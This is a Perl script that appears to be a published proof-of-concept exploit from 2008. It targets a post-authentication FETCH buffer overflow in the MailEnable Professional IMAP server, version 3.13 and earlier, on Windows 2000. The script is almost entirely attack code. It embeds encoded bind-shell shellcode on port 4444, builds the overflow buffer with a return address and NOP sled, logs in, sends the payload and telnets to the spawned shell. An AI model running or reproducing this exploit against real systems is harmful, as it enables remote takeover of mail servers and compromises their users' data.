#!/usr/bin/perl # ================================================================= # MailEnable Professional <= 3.13 "FETCH" post-auth buffer overflow # ================================================================= # # Bind Shell POC Exploit for Win2K SP4 pro English # # Found by : Luigi Auriemma # Advisory : http://aluigi.altervista.org/adv/maildisable-adv.txt # # Exploit by : haluznik | haluznikgmail.com # # 10.3.2008 ..enjoy!:] # ================================================================= use IO::Socket; print "\n [*] MailEnable Professional 3.13 imap remote exploit"; print "\n [*] exploit by haluznik | bug discovered by Luigi Auriemma\n\n"; if (@ARGV < 3) { print " [!] Use: perl imap.pl [Host] [User] [Pass]\n"; exit; } my $host = $ARGV[0]; my $user = $ARGV[1]; my $pass = $ARGV[2]; my $port = "143"; # metasploit shellcode port 4444 # bad char: 0x00 0x0A 0x0D 0x20 0x29 my $shellcode= "\x2b\xc9\x66\x81\xe9\xb0\xff\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76". "\x0e\xe6\x02\xe4\x6f\x83\xee\xfc\xe2\xf4\x1a\x68\x0f\x22\x0e\xfb". "\x1b\x90\x19\x62\x6f\x03\xc2\x26\x6f\x2a\xda\x89\x98\x6a\x9e\x03". "\x0b\xe4\xa9\x1a\x6f\x30\xc6\x03\x0f\x26\x6d\x36\x6f\x6e\x08\x33". "\x24\xf6\x4a\x86\x24\x1b\xe1\xc3\x2e\x62\xe7\xc0\x0f\x9b\xdd\x56". "\xc0\x47\x93\xe7\x6f\x30\xc2\x03\x0f\x09\x6d\x0e\xaf\xe4\xb9\x1e". "\xe5\x84\xe5\x2e\x6f\xe6\x8a\x26\xf8\x0e\x25\x33\x3f\x0b\x6d\x41". "\xd4\xe4\xa6\x0e\x6f\x1f\xfa\xaf\x6f\x2f\xee\x5c\x8c\xe1\xa8\x0c". "\x08\x3f\x19\xd4\x82\x3c\x80\x6a\xd7\x5d\x8e\x75\x97\x5d\xb9\x56". "\x1b\xbf\x8e\xc9\x09\x93\xdd\x52\x1b\xb9\xb9\x8b\x01\x09\x67\xef". "\xec\x6d\xb3\x68\xe6\x90\x36\x6a\x3d\x66\x13\xaf\xb3\x90\x30\x51". "\xb7\x3c\xb5\x51\xa7\x3c\xa5\x51\x1b\xbf\x80\x6a\xf5\x33\x80\x51". "\x6d\x8e\x73\x6a\x40\x75\x96\xc5\xb3\x90\x30\x68\xf4\x3e\xb3\xfd". "\x34\x07\x42\xaf\xca\x86\xb1\xfd\x32\x3c\xb3\xfd\x34\x07\x03\x4b". "\x62\x26\xb1\xfd\x32\x3f\xb2\x56\xb1\x90\x36\x91\x8c\x88\x9f\xc4". "\x9d\x38\x19\xd4\xb1\x90\x36\x64\x8e\x0b\x80\x6a\x87\x02\x6f\xe7". "\x8e\x3f\xbf\x2b\x28\xe6\x01\x68\xa0\xe6\x04\x33\x24\x9c\x4c\xfc". "\xa6\x42\x18\x40\xc8\xfc\x6b\x78\xdc\xc4\x4d\xa9\x8c\x1d\x18\xb1". "\xf2\x90\x93\x46\x1b\xb9\xbd\x55\xb6\x3e\xb7\x53\x8e\x6e\xb7\x53". "\xb1\x3e\x19\xd2\x8c\xc2\x3f\x07\x2a\x3c\x19\xd4\x8e\x90\x19\x35". "\x1b\xbf\x6d\x55\x18\xec\x22\x66\x1b\xb9\xb4\xfd\x34\x07\x16\x88". "\xe0\x30\xb5\xfd\x32\x90\x36\x02\xe4\x6f"; my $buff = "A" x 997 . "\xbb\xed\x4f\x7c" . "\x90" x 20 . $shellcode; my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$host, PeerPort=>$port); $socket or die " [-] cannot connect to host!\n"; recv($socket, $reply, 1024, 0); print " [i] " . $reply; print " [+] logging..\n"; $exploit = "a001 LOGIN " . $user ." " . $pass ."\r\n"; send $socket, $exploit, 0; recv($socket, $reply, 1024, 0); print " [i] " . $reply; $exploit = "a002 SELECT INBOX" ."\r\n"; send $socket, $exploit, 0; print " [+] sending evil payload..\n"; $exploit = "a003 FETCH 1:4 " . $buff ."\r\n"; send $socket, $exploit, 0; print " [*] exploiting done!\n"; print " [*] connecting to port 4444 of $host\n"; sleep(6); system("telnet $host 4444"); close $socket; exit;